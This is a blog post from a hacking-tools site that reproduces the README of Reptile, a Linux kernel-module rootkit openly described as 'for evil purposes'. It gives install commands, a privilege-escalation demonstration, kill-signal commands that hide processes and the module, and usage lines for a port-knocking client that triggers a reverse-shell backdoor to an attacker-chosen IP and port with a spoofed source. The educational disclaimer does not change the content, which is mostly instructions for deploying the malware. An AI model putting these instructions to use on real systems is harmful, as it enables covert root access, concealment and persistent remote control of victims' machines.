TENDING_$type=grid$count=5$tbg=rainbow$meta=0$snip=0$rm=0$show=home

Reptile: LKM Linux Rootkit

Wednesday, 25 October 2017 Edit this post

Reptile is a LKM rootkit for evil purposes. If you are searching stuff only for study purposes, see the demonstration codes . Features ...

Reptile is a LKM rootkit for evil purposes. If you are searching stuff only for study purposes, see the demonstration codes.

Features

  • Give root to unprivileged users
  • Hide files and directories
  • Hide files contents
  • Hide processes
  • Hide himself
  • Boot persistence
  • Heaven's door - A ICMP/UDP port-knocking backdoor
  • Client to knock on heaven's door :D

Install

[apt-get install linux-headers-$(uname -r)]

[https://github.com/f0rb1dd3n/Reptile.git]

[cd Reptile]

[./installer.sh install]

Usage

Binaries will be copied to /reptile folder, that will be hidden by Reptile.

Getting root privileges
[hax@Debian:~$ id
uid=1000(hax) gid=1000(hax) grupos=1000(hax),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth),118(scanner)
hax@Debian:~$ /reptile/r00t
You got super powers!]

[root@Debian:/home/hax# id
uid=0(root) gid=0(root) groups=0(root)]

Hiding

  • Hide/unhide reptile module: kill -50 0
  • Hide/unhide process: kill -49 <PID>
  • Hide files contents: all content between the tags will be hidden
Example
[#<reptile>
content to hide
#</reptile>]

Knocking on heaven's doorHeaven's door is a ICMP/UDP port-knocking backdoor used by Reptile. To access the backdoor you can use the client:
Knock Knock on Heaven's Door
Writen by: F0rb1dd3n

Usage: ./knock_on_heaven <args>

-x      protocol (ICMP/UDP)
-s      Source IP address (You can spoof)
-t      Target IP address
-p      Source Port
-q      Target Port
-d      Data to knock on backdoor: "<key> <reverse IP> <reverse Port>"
-l      Launch listener

[!] ICMP doesn't need ports

ICMP: ./knock_on_heaven -x icmp -s 192.168.0.2 -t 192.168.0.3 -d "F0rb1dd3n 192.168.0.4 4444" -l
UDP:  ./knock_on_heaven -x udp  -s 192.168.0.2 -t 192.168.0.3 -p 53 -q 53 -d "F0rb1dd3n 192.168.0.4 4444" -l

Disclaimer

Some functions of this module is based on another rootkits. Please see the references!

References

Labels:

SHARE:

Twitter Facebook Google Pinterest

Important Notice

For Educational and Informational Purposes Only.

The information contained in our Website, Programs, and Services is for educational and informational purposes only and is made available to you as self-help tools for your own use. I am not responsible for any kind of damage hardware and software and not liable for any kind of unethical activity.
Name

Amazon,1,Amazon Web Service,1,Auditing,2,AWS,1,BaRMIe,1,Books,1,Brup Suite Plugin,1,Burp Suite,1,Cloudflare,1,CSRF,1,CVE,1,Cyber Crime,1,CyberScan,1,Data Breach,1,DumpsterFire Toolset,1,EllaScanner,1,Enumeration Tool,1,Exploit Pack,1,Exploiting,1,Github,1,Information Gathering,1,Kali Linux,1,Linux,4,Mac OS X,2,News,1,OWASP,1,Pentesting,2,Pentesting Framework,2,Privilege Escalation,1,Python Keylogger,1,Reflector,1,Reptile,1,Rootkit,1,Scanner,2,Seccubus,1,Security,2,theHarvester,1,Tools,17,VHostScan,1,Vulnerability,2,WAF,1,Whole Foods Market Breached,1,Windows,3,XSS,1,ZAP,1,
ltr
item
Exploitable — Cyber Security News & Hacking Tools: Reptile: LKM Linux Rootkit
Reptile: LKM Linux Rootkit
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZhzOa0C1LHekroIQSNWqkQv0eyxHOcbohXQaXIV16KciExUfr3zim_tiPNGuJu8Y86AdBQ3UeZpLI0ME0IJf9DspxRS5OZs5Y6fkkPVEsjoZyf8VtgZFZJvqwfws9tkrJjA2ShnBEn0s/s320/reptile-lkm-linux-rootkit.jpg
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZhzOa0C1LHekroIQSNWqkQv0eyxHOcbohXQaXIV16KciExUfr3zim_tiPNGuJu8Y86AdBQ3UeZpLI0ME0IJf9DspxRS5OZs5Y6fkkPVEsjoZyf8VtgZFZJvqwfws9tkrJjA2ShnBEn0s/s72-c/reptile-lkm-linux-rootkit.jpg
Exploitable — Cyber Security News & Hacking Tools
https://exploitables.blogspot.com/2017/10/reptile-lkm-linux-rootkit.html
https://exploitables.blogspot.com/
https://exploitables.blogspot.com/
https://exploitables.blogspot.com/2017/10/reptile-lkm-linux-rootkit.html
true
8536886516600496120
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS CONTENT IS PREMIUM Please share to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy